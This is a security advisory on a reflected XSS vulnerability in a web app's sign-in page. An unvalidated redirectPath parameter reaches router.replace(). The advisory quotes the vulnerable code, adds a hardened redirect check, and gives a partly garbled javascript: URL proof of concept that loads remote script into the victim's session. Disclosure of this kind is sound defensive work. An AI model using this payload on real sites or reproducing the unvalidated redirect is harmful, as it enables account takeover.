May 23, 2024

GHSL-2024-040: Cross-Site Scripting (XSS) in the sign-in page of - CVE-2024-30264

Kevin Stubbings

Coordinated Disclosure Timeline


A reflected cross-site scripting (XSS) vulnerability in the sign-in page of may allow an attacker to hijack a user's account.


Tested Version



Reflected XSS in SignInForm.tsx (GHSL-2024-040)

The sign-in page reads the redirectPath parameter from the URL query string and, once the user is authenticated, passes it to router.replace() without checking its scheme or origin. If a user clicks a link whose redirectPath uses the javascript: scheme, the attacker who crafted the link may be able to execute arbitrary JavaScript with the privileges of that user.

export const SignInForm = ({
  defaultEmail,
}: Props & HTMLChakraProps<'form'>) => {
  const { t } = useTranslate()
  const router = useRouter()
  const { status } = useSession()
  const [authLoading, setAuthLoading] = useState(false)
  const [isLoadingProviders, setIsLoadingProviders] = useState(true)

  const [emailValue, setEmailValue] = useState(defaultEmail ?? '')
  const [isMagicLinkSent, setIsMagicLinkSent] = useState(false)

  const { showToast } = useToast()
  const [providers, setProviders] = useState<
    Record<LiteralUnion<BuiltInProviderType, string>, ClientSafeProvider> | undefined
  >()

  const hasNoAuthProvider =
    !isLoadingProviders && Object.keys(providers ?? {}).length === 0

  useEffect(() => {
    if (status === 'authenticated') {
      // Sink: redirectPath is taken verbatim from the URL query string and
      // handed to router.replace(), so a javascript: URL is navigated to.
      router.replace(router.query.redirectPath?.toString() ?? '/typebots')
    }
  }, [router, status])
  // ...
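As an added example (this is not code from the advisory or from the affected project), the following TypeScript places the vulnerable pattern above next to a check that only accepts same-origin, path-absolute redirect targets. It leans on the WHATWG URL parser: resolved against the application origin, a javascript: value gets the opaque origin "null", and protocol-relative (//evil) or backslash (/\evil) values resolve to a foreign origin, so all of them fall back to the default. The application origin https://app.example, the default /typebots and the payload strings are constructed for the example.

```typescript
// Added example: vulnerable vs hardened resolution of a redirectPath query value.
// Assumed values: DEFAULT_REDIRECT and the app origin used in the tests are hypothetical.

const DEFAULT_REDIRECT = '/typebots'

// Vulnerable pattern from the advisory: the query value becomes the navigation target as-is.
// With Next.js router.query the value is string | string[] | undefined.
function vulnerableRedirect(redirectPath: string | string[] | undefined): string {
  return redirectPath?.toString() ?? DEFAULT_REDIRECT
}

// Hardened version: return a same-origin path, or the default if the value is
// missing, unparsable, or resolves to any other origin (including "null" for
// javascript: and data: URLs).
function safeRedirect(
  redirectPath: string | string[] | undefined,
  appOrigin: string
): string {
  // A repeated query parameter arrives as an array; take the first value only.
  const raw = Array.isArray(redirectPath) ? redirectPath[0] : redirectPath
  if (typeof raw !== 'string' || raw.length === 0) return DEFAULT_REDIRECT

  let target: URL
  try {
    // Relative paths resolve onto appOrigin; anything carrying its own scheme
    // or authority keeps that scheme/authority and therefore its own origin.
    target = new URL(raw, appOrigin)
  } catch {
    return DEFAULT_REDIRECT
  }

  if (target.origin !== new URL(appOrigin).origin) return DEFAULT_REDIRECT

  // Re-serialise only the path, query and fragment so the caller never
  // navigates to a string the attacker fully controls.
  return target.pathname + target.search + target.hash
}

export { vulnerableRedirect, safeRedirect, DEFAULT_REDIRECT }
```

The same check can run inside the useEffect shown above by replacing the argument to router.replace() with safeRedirect(router.query.redirectPath, window.location.origin). Rejecting anything that is not same-origin also closes the open-redirect case (an https://evil.example target), not only the javascript: scheme.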

This vulnerability was found with the help of CodeQL’s Reflected XSS Query


This issue may lead to account takeover.

Proof of Concept

The following link retrieves a JavaScript file from localhost and executes it in the context of the application's origin. An attacker can use the same payload to load JavaScript from a host they control and execute it in the victim's session.

;script.src%20=%20%27http://;%20document.head.appendChild(script);#//




This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).


You can contact the GHSL team at ; please include a reference to GHSL-2024-040 in any communication regarding this issue.